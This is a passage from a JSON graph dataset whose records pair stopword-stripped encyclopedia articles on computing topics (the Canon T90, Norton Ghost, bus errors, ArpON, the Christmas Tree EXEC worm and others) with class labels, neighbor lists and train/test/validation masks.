command dial new f-1 requires focusing screen change switch metering patterns t90 partial area metering uses center 13 picture area spot metering uses center 2.7 canon copied metering options found olympus om-4 multi-spot metering allows photographer average eight spot meter readings different parts scene another feature borrowed olympus separate highlight shadow spot readings could taken adjust camera metering decisions ensure extremes tonal range muted grey final exposure two built-in sensors used implement metering options center-weighted partial area metering performed double-area silicon photocell spc canon standard location eyepiece spot metering performed another spc located bottom mirror box light reaches sensor via half-silvered area main mirror secondary mirror located beneath spot metering cell also allows automatic ttl off-the-film flash metering borrowed olympus notably lacking common metering mode slr cameras matrix metering nikon introduced fa 1983 canon follow suit 1987 eos 650 eight exposure modes available program ae auto-exposure mode puts exposure control completely hands camera variable shift program ae allows photographer bias camera towards narrow aperture three wide angle settings fast shutter speed three telephoto settings well standard mode manual control aperture priority ae shutter-speed priority ae allow photographer set one exposure variable manually camera chooses either latter two modes safety shift feature allows camera adjust fixed parameter obtain correct exposure otherwise example aperture priority mode photographer aperture fixed wide open photograph bright scene correct shutter speed expose correctly aperture might faster camera capable safety shift lets camera reduce aperture achieve correct exposure maximum shutter speed safety shift feature turned pressing two buttons back camera near base automation exposure desired manual mode available camera metering acts sophisticated light-meter decisions made photographer use older lenses automated aperture diaphragm stopped-down aperture priority ae stopped-down manual used instruct camera currently set aperture taking aperture therefore adjust metering calculations accordingly finally flash ae mode available flash photography t90 first canon camera support through-the-lens ttl flash metering measures actual light levels reaching film measuring reflected light film otf shutting flash unit film sufficiently exposed measurement calculated using average reflectivity color negative film system also used canon new eos system making t90 non-eos canon body compatible ttl canon flashes t90 x-sync speed 1/250 second fastest canon achieved better cameras available time production new dedicated flash unit speedlite 300tl launched alongside t90 support new flash modes zoomable head capable adjustment moving head cover fields view 24 35 50 85 mm lenses bounce flash head rotated 90° vertically 180° left 90° right well plain ttl mode 300tl supports a-ttl advanced ttl flash-to-subject distance calculated using infrared pulse detector mounted flash body bounce mode however uses 1/20th power pre-flash instead pre-flash also used fe lock mode flash exposure lock mode pre-flash used conjunction spot metering determine correct exposure advance taking picture thus camera moved reframe main subject off-center still expose correctly exposures slower x-sync speed previous slr flash systems triggered flash start exposure soon first shutter curtain finished travel however motion blurs light trails longer exposure method gives impression backwards movement since motion trails front moving object flash t90 became first mass-market camera support second-curtain flash flash fires end exposure second shutter curtain starts close although identical current 2009 canon speedlite 580 ex ii supports t90 well canon also produced dedicated macro ring flash camera ml-2 supports ttl manual models contains two flash tubes one either side fired separately together system consists flash ring fits onto end lens control unit screws hot shoe atop camera later ml-3 ring flash introduced eos system cameras also supports t90 t90 support vast range accessories available canon f-1 f-1n new f-1 number significant accessories available pentaprism interchangeable focusing screen eight different screens available different applications standard new split/microprism screen offers three common focusing aids simultaneously central circle split image prism surrounded microprism ring rest screen laser matte two optional data backs available t90 first command back 90 allows date data imprinting photographs also allowed various forms time-lapse photography second sold canon certain markets data memory back 90 stores 16 shot variables 156 exposures six variables 338 exposures computer interface data memory back 90 supports msx home computer standard third parties adapted connectors computer systems wired 60t3 remote control unit plugs socket fitted beneath right handgrip infrared remote control kit also available lc-2 unit also supports auto sensing mode completely unmanned photography trips shutter whenever something blocked path transmitter receiver—useful wildlife photography example number modifications t90 performed years canon third parties order add features missing camera as-built canon ceased supporting camera 1998 spare parts longer available subsequent difficulty obtaining repair services likely discourage remaining professional use cameras one issue lcd liquid crystal display life problem unique t90 lcd displays age wear varying rate dependent environmental conditions use factors commonly quoted lifespans five ten years thus many t90s displays nearing end lives even replaced spare part longer available third-party replacement emerged plastic battery holder t90 somewhat susceptible breakage cause camera become inoperative used cameras carefully checked broken/repaired battery holder compartments another common problem failure second internal battery retains frame number/iso settings replacement requires service person skilled soldering techniques camera disassembly another serious problem concerns shutter t90 shutter appears become sticky camera ages prone locking case camera lcd displays eee message help appears viewfinder display commonly called eee syndrome among users problem likely crop camera left unused time thus best way prevent regular use camera seem cause inaccurate shutter speeds failure problem corrected knowledgeable technician without replacing shutter mechanism reportedly caused dirt shutter magnets affecting performance left unused extended period time circuit need replaced expensive time-consuming proposition sticky shutter problem relates rubber washer involved operation shutter age atmospheric conditions tends deteriorate become sticky impedes operation shutter frequent use delay stickiness 'glueing shutter started long-term remedy shutter repaired rubber washer replaced another 10 years enjoyed camera working correctly good short term solution lightly clean shutter diaphragm cotton ball lighter fluid electronically controlled slr film cameras working canon t90 bargain used market prices used camera dealers providing warranties range approximately us 120–140 camera working condition approximately us 240–260 camera body mint condition accessories box manual canon fd lenses however remain quite affordable compared ef counterparts",
    "neighbors": [
      1776,
      7041,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6295,
    "label": 4,
    "text": "ArpON:arpon arpon arp handler inspection computer software project improve network security attracted interest among network managers academic researchers frequently cited means protecting arp-based attacks address resolution protocol arp security issues include man middle mitm attack arp spoofing arp cache poisoning arp poison routing attacks arpon host-based solution make arp standardized protocol secure order avoid man middle mitm attack arp spoofing arp cache poisoning arp poison routing attack possible using three kinds anti arp spoofing techniques goal arpon therefore provide secure efficient network daemon provides sarpi darpi harpi anti arp spoofing technique thus making arp standardized protocol secure foreign intrusion",
    "neighbors": [
      939,
      6013,
      7983,
      4307,
      4085,
      87,
      823,
      5397,
      5437,
      2045,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6296,
    "label": 2,
    "text": "Bus_error:bus error computing bus error fault raised hardware notifying operating system os process trying access memory cpu physically address invalid address address bus hence name modern use architectures much rarer segmentation faults occur primarily due memory access violations problems logical address permissions posix-compliant platforms bus errors usually result sigbus signal sent process caused error sigbus also caused general device fault computer detects though bus error rarely means computer hardware physically broken—it normally caused bug software bus errors may also raised certain paging errors see least three main causes bus errors software instructs cpu read write specific physical memory address accordingly cpu sets physical address address bus requests hardware connected cpu respond results answer specific address hardware responds cpu raises exception stating requested physical address unrecognized whole computer system note covers physical memory addresses trying access undefined virtual memory address generally considered segmentation fault rather bus error though mmu separate processor tell difference cpus byte-addressable unique memory address refers 8-bit byte cpus access individual bytes memory address generally access larger units 16 bits 32 bits 64 bits without units aligned specific boundary x86 platform notable exception example multi-byte accesses must 16 bit-aligned addresses given bytes 0 2 4 6 would considered aligned therefore accessible addresses 1 3 5 would considered unaligned similarly multi-byte accesses must 32-bit aligned addresses 0 4 8 12 would considered aligned therefore accessible addresses would considered unaligned attempting access unit larger byte unaligned address cause bus error systems may hybrid depending architecture used example hardware based ibm system/360 mainframe including ibm system z fujitsu b8000 rca spectra univac series 90 instructions must 16-bit boundary execution addresses must start even byte attempts branch odd address results specification exception data however may retrieved address memory may one byte longer depending instruction cpus generally access data full width data bus times address bytes access memory full width data bus mask shift address individual byte systems tolerate inefficient algorithm essential feature software especially string processing unlike bytes larger units span two aligned addresses would thus require one fetch data bus possible cpus support functionality rarely required directly machine code level thus cpu designers normally avoid implementing instead issue bus errors unaligned memory access freebsd linux solaris signal bus error virtual memory pages paged e.g disappeared e.g accessing memory-mapped file executing binary image truncated program running just-created memory-mapped file physically allocated disk full x86 exists older memory management mechanism known segmentation application loads segment register selector non-present segment posix-compliant oses done assembly language exception generated oses used swapping linux generates sigbus example unaligned memory access written c programming language assembly syntax compiling running example posix compliant os x86 demonstrates error gdb debugger shows immediate value 0x2a stored location stored eax register using x86 assembly language example register indirect addressing printing low order bits address shows aligned word boundary dword using x86 terminology",
    "neighbors": [
      2560,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      3615,
      9762,
      4643,
      6180,
      5158,
      7728,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      6221,
      3160,
      2653,
      10333,
      97,
      11363,
      7269,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      2201,
      9370,
      9882,
      7325,
      9887,
      6821,
      8879,
      3248,
      178,
      9907,
      6837,
      9911,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      6868,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      1776,
      242,
      5363,
      9466,
      2811,
      9468,
      7421,
      1278,
      10499,
      5380,
      1801,
      1804,
      10508,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      5933,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      7071,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      8625,
      10676,
      6075,
      6078,
      9151,
      6596,
      11204,
      11205,
      4040,
      8136,
      9166,
      7631,
      477,
      10730,
      10731,
      8687,
      6128,
      5105,
      499,
      5619,
      5115,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 6297,
    "label": 4,
    "text": "Ghost_(disk_utility):ghost disk utility ghost acronym general hardware-oriented system transfer disk cloning backup tool originally developed murray haszard 1995 binary research technology acquired 1998 symantec backup recovery functionality replaced symantec system recovery ssr although ghost imaging technology still actively developed available part symantec ghost solution suite binary research developed ghost auckland new zealand symantec acquisition functions translation languages moved elsewhere main development remained auckland october 2009 time much moved india technologies developed 20/20 software integrated ghost acquisition symantec april 2000 first versions ghost supported cloning entire disks however version 3.1 released 1997 supports cloning individual partitions ghost could clone disk partition another disk partition image file ghost allows writing clone image second disk machine another machine linked parallel network cable network drive tape drive version 4.0 ghost added multicast technology following lead competitor imagecast multicasting supports sending single backup image simultaneously machines without putting greater stress network sending image single machine version also introduced ghost explorer windows program supports browsing contents image file extract individual files explorer subsequently enhanced support adding deleting files image fat later ext2 ext3 ntfs file systems 2007 ghost explorer could edit ntfs images ghost explorer could work images older versions slowly version 4 images contain indexes find files rapidly version 4.0 also moved real-mode dos 286 protected mode additional memory available allows ghost provide several levels compression images provide file browser 1998 ghost 4.1 supports password-protected images version 5.0 moved 386 protected mode unlike text-based user interface earlier versions 5.0 uses graphical user interface gui binary research logo two stars revolving around plays main screen program idle 1998 gdisk script-based partition manager integrated ghost gdisk serves role similar fdisk greater capabilities norton ghost version novell netware called 2.0 released around 1999 supports nss partitions although runs dos like others ghost 6.0 released 2000 includes management console managing large numbers machines console communicates client software managed computers allows system administrator refresh disk machine remotely dos-based program ghost requires machines running windows reboot dos run ghost 6.0 requires separate dos partition used console released march 31 2001 norton ghost version 7.0 retail marketed norton ghost 2002 personal edition released december 14 2001 ghost 7.5 creates virtual partition dos partition actually exists file within normal windows file system significantly eased systems management user longer set partition tables ghost 7.5 write images cd-r discs later versions write dvds ghost 8.0 run directly windows well-suited placement bootable media bartpe′s bootable cd corporate edition supports unicast multicast peer-to-peer transfers via tcp/ip ghost 8.0 supports ntfs file system although ntfs accessible dos program off-line version ghost runs bootable media place installed operating system originally faced number driver support difficulties due limitations increasingly obsolete 16-bit dos environment driver selection configuration within dos non-trivial beginning limited space available floppy disks made disk cloning several different disk controllers difficult task different scsi usb cd-rom drives involved mouse support possible often left due limited space drivers floppy disk devices usb often work using newer features usb 2.0 instead operating 1.0 speeds taking hours taken minutes widespread support dos went decline became increasingly difficult get hardware drivers dos newer hardware disk imaging competitors ghost dealt decline dos moving recovery environments freebsd linux windows pe draw current driver development able image newer models disk controllers nevertheless dos version ghost compatible hardware configurations works much faster *nix based image backup tools ghost 8 later windows programs run windows pe bartpe hiren bootcd use plug play hardware drivers standard desktop computer making hardware support ghost much simpler norton ghost 2003 consumer edition ghost released september 6 2002 available independent product norton ghost 2003 also included component norton systemworks 2003 professional simpler non-corporate version ghost norton ghost 2003 include console windows front-end script ghost operations create bootable ghost diskette machine still needs reboot virtual partition user need interact dos symantec deprecated liveupdate support norton ghost 2003 early 2006 released november 15 2004 symantec renamed enterprise version ghost symantec ghost solution suite 1.0 helped clarify difference consumer business editions product defined february 2006 release norton save restore also known norton backup restore standalone backup application based ghost 10.0 ghost solution suite 1.1 bundle updated version ghost symantec client migration user data settings migration tool former powerquest equivalent deploycenter using pqi images ghost solution suite 1.1 released december 2005 create image file larger 2 gb ghost 8.2 earlier image files automatically split two segments segment maximum size 2 gb new features include comprehensive manufacturing tools ability create universal boot disk end 2003 symantec acquired largest competitor disk-cloning field powerquest august 2 2004 norton ghost 9.0 released new consumer version ghost based powerquest′s drive image version 7 provides live imaging windows system ghost 9 continues leverage powerquest file format meaning backward compatible previous versions ghost however version ghost 8.0 included ghost 9 recovery disk support existing ghost customers ghost 9.0 released august 2 2004 represents significant shift consumer product line ghost 2003 several ways since ghost 9 support older .gho format disk images separate cd containing ghost 2003 included retail packaging users needing access older images limitations ghost 9 compared ghost 2003 well-communicated symantec resulted many dissatisfied customers purchased ghost 9 expecting previous version′s features like making images bootable ghost environment installation required product activation supports creating images cds dvds iomega zip jaz disks well ieee 1394 firewire usb mass storage devices supports encrypting images maxtor external hard disk drives maxtor onetouch buttons ghost 10.0 compatible previous versions future versions norton save restore 1.0 released february 2006 renamed consumer version ghost used ghost 10.0′s engine addition features allow backup restoration individual files ghost solution suite 2.0 released november 2006 version provides significant improvements performance well ability edit ntfs images version also adds support windows vista x64 versions windows guid partition table gpt disks however software fully support systems extensible firmware interface efi firmware ghost 11.0 supports saving restoring native ghost image format .gho .ghs raw images .img .raw ghost 12.0 includes windows vista support updated thorough user interface supports full system backup individual files folders backup version provides lightsout restore feature restores system on-disk software recovery environment similar windows thereby allowing recovery without bootable cd upon system startup menu asks whether start operating system lightsout recovery environment lightsout restore would augment iso image comes ghost latter contains recovery environment recover system without working operating system nsr 2.0 fewer features comparison norton ghost 12 nsr 2.0 offers one-time backups file folder backup simplified schedule editor maxtor onetouch integration modifiable symantec recovery disc version supports 32-bit 64-bit versions windows xp vista version 14.0 uses volume snapshot service vss make backups store backups ftp site ghost connect threatcon symantec service monitors malware activity around world performs incremental backups specific threat level reached features include ability back network-attached storage devices support ntfs partitions 16tb ghost manage installations version 12.0 later across network version longer supports opening .gho image files stores images .v2i format incremental backup images created norton ghost saved .iv2i filename extensions alone original full backup .v2i filename extension regular basis older .gho image files restored using ghost explorer separate utility ghost software enterprise including ghost 11.5 released may 2008 new features include january 6 2010 latest build live update 11.5.1.2266 live update 5 lu5 updates ghost solution suite 2.5.1 provides support windows 7 windows server 2008 r2 furthermore ghost 11.5 compatible bartpe bootable cd using pe builder plug-in symantec ghost 11 according norton community symantec′s site following features available norton ghost 15 ghost software enterprise including ghost 12.0 deployment solution 6.9 announced march 2015 ghost software enterprise including ghost 12.0 deployment solution 6.9 released 7 march 2016 ghost software enterprise including ghost 12.0 deployment solution 6.9 released 18 may 2017 release update 3 released 22 september 2017 added support ext4 filesystem ghost software enterprise including ghost 12.0 deployment solution 6.9 released 31 october 2018 release added support ghost solution suite web console ipxe windows server 2016 smart raw imaging 4k native drive support ghost marketed os deployment solution capture deployment environment requires booting windows pe environment accomplished creating iso burn dvd usb bootable disk installed client automation folder delivered pxe server provides environment perform offline system recovery image creation ghost mount backup volume recover individual files ghost copy contents one volume another convert volume contents virtual disk vmdk vhd format initially ghost supported fat file system although could copy resize file systems performing sector-by-sector transfer ghost added support ntfs later 1996 also provided program ghostwalker change security id sid made windows nt systems distinguishable ghostwalker capable modifying name windows nt computer interface ghost added support ext2 file system 1999 ext3 subsequently support ext4 added september 2017 norton ghost discontinued april 30 2013 support via chat knowledge base available june 30 2014 removed symantec ghost web page invited ghost customers try symantec system recovery described software backup disaster recovery",
    "neighbors": [
      5512,
      6797,
      8976,
      2193,
      10896,
      7955,
      2197,
      5142,
      2199,
      10903,
      6297,
      9762,
      5924,
      3366,
      1708,
      7983,
      8368,
      11568,
      9141,
      2870,
      823,
      9655,
      9910,
      11065,
      3520,
      9025,
      7364,
      2378,
      7244,
      8398,
      5080,
      1247,
      9569,
      10476,
      2545,
      3315,
      6643,
      246,
      10872,
      8572,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 6298,
    "label": 4,
    "text": "Public_Register_of_Travel_and_Identity_Documents_Online:public register travel identity documents online prado council european union public register authentic travel identity documents online prado contains technical descriptions including information important security features identity travel documents countries within european union schengen area countries neighbouring countries well many third countries worldwide council joint action 98/700/jha 3 december 1998 european image archiving system fado false authentic documents online set first part system expert fado went online end 2004 secure communication among document experts 2007 ifado prado released ifado intranet fado contains important information expert fado access restricted governmental use prado small subset information published general public prado hosted general secretariat council european union gsc directorate general justice home affairs dgd 1a prado contains basic technical descriptions including information security features authentic identity travel documents information selected provided document experts member states european union eu iceland norway switzerland part information contained classified restricted expert fado system made publicly available via prado pages steering committee council european union currently working party frontiers formation false documents experts travel identity documents categorised follows document categories document types document types civil status documents information practically important documents eu schengen countries present overall number described documents third countries however differs widely country country information added every week prado users also find links websites lists travel documents officially recognised eu member states schengen states information invalid document numbers provided eu member states well third countries information related identity checking document checking document fraud also present prado available 24 official languages european union documents introduced document experts currently 31 participating countries languages standardised descriptions translated automatically thus documents immediately available supported languages additional free text information contained translated online specialised linguists general secretariat council european union website published general secretariat council european union transparency reasons also provide important service many users europe especially non-governmental organisations need legal obligation check identities example",
    "neighbors": [
      6882
    ],
    "mask": "None"
  },
  {
    "node_id": 6299,
    "label": 1,
    "text": "MySQL_Connector/ODBC:mysql connector/odbc mysql connector/odbc known myodbc computer software oracle corporation odbc interface allows programming languages support odbc interface communicate mysql database mysql connector/odbc originally created mysql ab",
    "neighbors": [
      8262,
      7022
    ],
    "mask": "None"
  },
  {
    "node_id": 6300,
    "label": 3,
    "text": "Nukernel:nukernel nukernel microkernel developed apple computer early 1990s written scratch apple designed using concepts mach 3.0 extensive additions soft real-time scheduling improve multimedia performance intended used basis copland operating system one version seen publicly copland alpha release proved extremely unstable development apparently ended cancellation copland 1996 ers external reference specification nukernel contained entirety object oriented message passing system method filed march 19 1996 granted december 31 1996 one-time technical lead nukernel jeff robbin one driving forces behind itunes ipod apple nukernel name confused nukernel name custom kernel beos",
    "neighbors": [
      2761,
      7561,
      9931,
      11180,
      7983,
      7187,
      5363,
      11123,
      9176,
      5976,
      5049,
      8700,
      10813
    ],
    "mask": "Test"
  },
  {
    "node_id": 6301,
    "label": 3,
    "text": "Ångström_distribution:ångström distribution ångström distribution linux distribution variety embedded devices distribution result work developers openzaurus openembedded opensimpad projects graphical user interfaces guis available opie gpe among options ångström distribution cooptition poky linux ångström based openembedded project specifically openembedded-core oe-core layer ångström poky linux based oe-core mostly utilize toolchain officially yocto compatible poky linux officially part yocto project ångström primarily differs poky linux binary distribution like e.g debian fedora opensuse ubuntu linux distributions using opkg package management hence essential part ångström builds binary package feed allowing simply install software distributed opkg packages without compile first one might install binary package aptitude dpkg according ångström wiki ångström developed least following devices",
    "neighbors": [
      9732,
      5637,
      6,
      11271,
      3089,
      10780,
      3618,
      9253,
      11305,
      3626,
      7727,
      56,
      9784,
      1083,
      59,
      4673,
      1602,
      10817,
      7246,
      7253,
      1110,
      3162,
      607,
      2658,
      3685,
      6763,
      9324,
      10860,
      2671,
      1138,
      8315,
      8316,
      8829,
      11388,
      11391,
      4225,
      2179,
      6276,
      7812,
      8326,
      8837,
      9356,
      1682,
      2195,
      10393,
      10394,
      1694,
      673,
      3745,
      7854,
      3248,
      7857,
      2738,
      4790,
      5824,
      8907,
      4305,
      2259,
      1761,
      8423,
      7913,
      4841,
      6890,
      9964,
      7920,
      5363,
      5875,
      9461,
      6393,
      5369,
      8957,
      7938,
      4360,
      7435,
      4364,
      2321,
      1813,
      4887,
      5406,
      4383,
      10530,
      823,
      7991,
      7483,
      3903,
      7492,
      2375,
      11079,
      4957,
      10080,
      2914,
      10599,
      9064,
      6508,
      2925,
      7020,
      7534,
      9074,
      4493,
      10127,
      11155,
      7579,
      10149,
      4011,
      9646,
      439,
      9660,
      4039,
      5067,
      2001,
      8147,
      3542,
      9693,
      485,
      10215,
      3561,
      495,
      8177,
      1524
    ],
    "mask": "Test"
  },
  {
    "node_id": 6302,
    "label": 2,
    "text": "Gaël_Duval:gaël duval gaël duval born 1973 french entrepreneur july 1998 created mandrake linux mandriva linux linux distribution originally based red hat linux kde also co-founder mandrakesoft merged mandriva jacques le marois frédéric bastok gaël duval responsible communication mandriva management team laid company march 2006 round cost-cutting duval suspected part reason dismissal disagreement management company future strategy resulting lawsuit company duval chairman chief technology officer ulteo company bought aznetwork group 2015 2016 co-founded nfactory.io incubator-accelerator startups november 2017 gael duval created /e/ mobile operating system fork android-based lineageos accompanied set online services /e/ released first beta september 12th 2018 operating system emphasizes data privacy use proprietary google services 2018 duval founded e foundation maintains /e/ duval graduate university caen normandy france studied networks documentary applications",
    "neighbors": [
      1026,
      9353,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      6808,
      7450,
      7584,
      673,
      802,
      5410,
      6691,
      6947,
      8354,
      5931,
      8364,
      1717,
      823,
      2109,
      11069,
      10687,
      10822,
      8263,
      843,
      589,
      6352,
      4177,
      10192,
      8787,
      11602,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "Test"
  },
  {
    "node_id": 6303,
    "label": 4,
    "text": "NProtect_GameGuard_Personal_2007:nprotect gameguard personal 2007 nprotect gameguard personal 2007 often referred nprotect ggp2007 anti-virus security suite microsoft windows 2000 xp vista developed inca internet users playing online computer games includes real-time protection forms malware including viruses trojans spyware worms keyloggers rootkits well game optimization feature like many security products nprotect gameguard personal 2007 cause collisions executed security products simultaneously collisions mainly occur running on-access scanning real-time scanning simultaneously nprotect gameguard personal 2007 available free non-free edition former lacking treatment abilities malware",
    "neighbors": [
      10756,
      2213,
      8526,
      7983,
      7515,
      10392,
      2041,
      7739
    ],
    "mask": "Test"
  },
  {
    "node_id": 6304,
    "label": 2,
    "text": "Mike_Lesk:mike lesk michael e. mike lesk born 1945 american computer scientist 1960s michael lesk worked smart information retrieval system project wrote much retrieval code many retrieval experiments well obtaining ba degree physics chemistry harvard college 1964 phd harvard university chemical physics 1969 1970 1984 lesk worked bell labs group built unix lesk wrote unix tools word processing tbl refer standard ms macro package troff compiling lex networking uucp also wrote portable i/o library predecessor stdio.h c contributed significantly development c language preprocessor 1984 left work bellcore managed computer science research group lesk worked specific information systems applications mostly geography system driving directions dictionaries system disambiguating words context 1990s lesk worked large chemical information system core project cornell online computer library center american chemical society chemical abstracts service 1998 2002 lesk headed national science foundation division information intelligent systems oversaw phase 2 nsf digital library initiative currently professor faculty library information science department school communication information rutgers university lesk received flame award lifetime achievement usenix 1994 fellow acm 1996 2005 elected national academy engineering authored number books selected books michael lesk",
    "neighbors": [
      7872,
      7780,
      8262,
      3468,
      11023,
      5492,
      2488,
      3385,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6305,
    "label": 2,
    "text": "Christmas_Tree_EXEC:christmas tree exec christmas tree exec first widely disruptive computer worm paralyzed several international computer networks december 1987 written student clausthal university technology rexx scripting language drew crude christmas tree text graphics sent entry target email contacts file way spread onto european academic research network earn bitnet ibm worldwide vnet systems caused massive disruption core mechanism iloveyou worm 2000 essentially christmas tree although ran pcs rather mainframes spread different network scripted using vbscript rather rexx name actually christma exec ibm vm systems originally required file names formatted 8+space+8 characters additionally ibm required rexx script files file type exec name sometimes written christmas exec adding 9th character make name readable user prompted ... type christmas ... —and fact launched worm displays message program run forwards mailbox addresses contained user address file",
    "neighbors": [
      3867,
      9283,
      10756,
      11683,
      2041,
      7515,
      10110
    ],
    "mask": "Test"
  },
  {
    "node_id": 6306,
    "label": 9,
    "text": "Gordon_Plotkin:gordon plotkin gordon david plotkin born 9 september 1946 theoretical computer scientist school informatics university edinburgh plotkin probably best known introduction structural operational semantics sos work denotational semantics particular notes structural approach operational semantics influential contributed many areas computer science plotkin educated university glasgow university edinburgh gaining bachelor science degree 1967 phd 1972 supervised rod burstall plotkin remained edinburgh burstall robin milner co-founder laboratory foundations computer science lfcs former doctoral students include luca cardelli philippa gardner doug gurr eugenio moggi lǐ wèi plotkin elected fellow royal society frs 1992 fellow royal society edinburgh frse member academia europæa also winner royal society wolfson research merit award plotkin received milner award 2012 fundamental research programming semantics lasting impact principles design programming languages nomination royal society reads",
    "neighbors": [
      10049,
      1830,
      11020,
      10031,
      5585,
      4916,
      1333,
      3926,
      1783,
      6070,
      3929,
      10102,
      10043,
      6460,
      9535
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6307,
    "label": 7,
    "text": "GoGrid:gogrid gogrid cloud infrastructure service hosting linux windows virtual machines managed multi-server control panel restful api july 2008 gogrid selected finalist linuxworld 2008 product excellence award idg world expo linuxworld.com may 2010 gogrid named lead411 list “ 2010 hottest san francisco companies ” june 2010 gogrid “ best channel incentives ” award 2010 ascii reseller success summit march 2012 gogrid selected winner cloud-infrastructure category ondemand 2012 alwayson 2011-2014 gogrid appeared gartner cloud infrastructure-as-a-service iaas magic quadrant",
    "neighbors": [
      6018,
      1539,
      8451,
      6027,
      4236,
      6797,
      526,
      911,
      272,
      1935,
      4623,
      8592,
      10893,
      405,
      2965,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      9766,
      39,
      5159,
      2217,
      6444,
      8495,
      3121,
      5681,
      9906,
      823,
      7352,
      10681,
      7357,
      11070,
      448,
      2496,
      4289,
      8515,
      10820,
      3269,
      11201,
      1224,
      8520,
      4683,
      4429,
      590,
      1102,
      7248,
      1362,
      467,
      5202,
      9682,
      7512,
      10200,
      6618,
      6367,
      4194,
      11235,
      3428,
      5732,
      11646,
      6632,
      1001,
      10090,
      2795,
      3819,
      7660,
      8044,
      119,
      2170,
      5499,
      253,
      8446,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 6308,
    "label": 4,
    "text": "James_Ryan_(cyber_security):james ryan cyber security james ryan born 1974 anchorage alaska american entrepreneur cyber security co-founder managing partner litmus logic security firm ryan contributions cyber security industry known economist history channel ryan born anchorage alaska 1974 holds bachelor master science electrical engineering virginia tech ryan currently resides northern virginia wife kidist three children motivational trainer ryan included book “ lifting curtain disgrace call urban high school education ” ryan founder managing partner since 2002 litmus logic llc boutique firm provides expertise security privacy cyber defense trust strategies internet technologies serves chief strategy officer cyber security summit minnesota innovation lab state-level economic development organization ryan one experts contributed economics digital identity 2015 technical report published economist intelligence unit 1993 1997 software engineer trw 1997 1998 system engineer lockheed martin 1998 1999 security network expert lucent technologies alcatel-lucent 1999 2002 principal consultant security network expert predictive systems ryan knowledge cyber security trust framework consults governments defense financial institutions software cloud providers united states department defense dod civil agencies spoke united states department defense cyber crime conference robotics alley cyber security summit security360 topics speeches included success cyber security public key infrastructure pki internet things cyber security robotics artificial intelligence national strategy trusted identities cyberspace ryan collaborated nasa electronic data systems eds creating identity credential access management icam segment architecture personal identity verification – interoperable piv-i trust framework new approach access control uses public key infrastructure pki featured together oliver north history channel program “ america ’ book secrets pentagon ” march 2012",
    "neighbors": [
      4194,
      10831,
      2737,
      3026,
      5531,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 6309,
    "label": 6,
    "text": "Filesystem-level_encryption:filesystem-level encryption filesystem-level encryption often called file-based encryption fbe file/folder encryption form disk encryption individual files directories encrypted file system contrast full disk encryption entire partition disk file system resides encrypted types filesystem-level encryption include advantages filesystem-level encryption include unlike cryptographic file systems full disk encryption general-purpose file systems include filesystem-level encryption typically encrypt file system metadata directory structure file names sizes modification timestamps problematic metadata needs kept confidential words files stored identifying file names anyone access physical disk know documents stored disk although contents documents one exception encryption support added zfs filesystem filesystem metadata filenames ownership acls extended attributes stored encrypted disk zfs metadata relating storage pool stored plaintext possible determine many filesystems datasets available pool including ones encrypted content stored files directories remain encrypted another exception cryfs replacement encfs cryptographic file systems specialized general-purpose file systems specifically designed encryption security mind usually encrypt data contain – including metadata instead implementing on-disk format block allocation file systems often layered top existing file systems e.g residing directory host file system many file systems also offer advanced features deniable encryption cryptographically secure read-only file system permissions different views directory structure depending key user ... one use cryptographic file system part existing file system synchronized 'cloud storage cases cryptographic file system could 'stacked top help protect data confidentiality",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      3629,
      4659,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      7794,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      10405,
      1190,
      5286,
      5293,
      7344,
      2737,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      251,
      8446,
      3328,
      11012,
      2314,
      8461,
      4366,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      6494,
      10596,
      2407,
      10087,
      2932,
      4982,
      6519,
      376,
      11128,
      890,
      11638,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      5552,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      8674,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 6310,
    "label": 2,
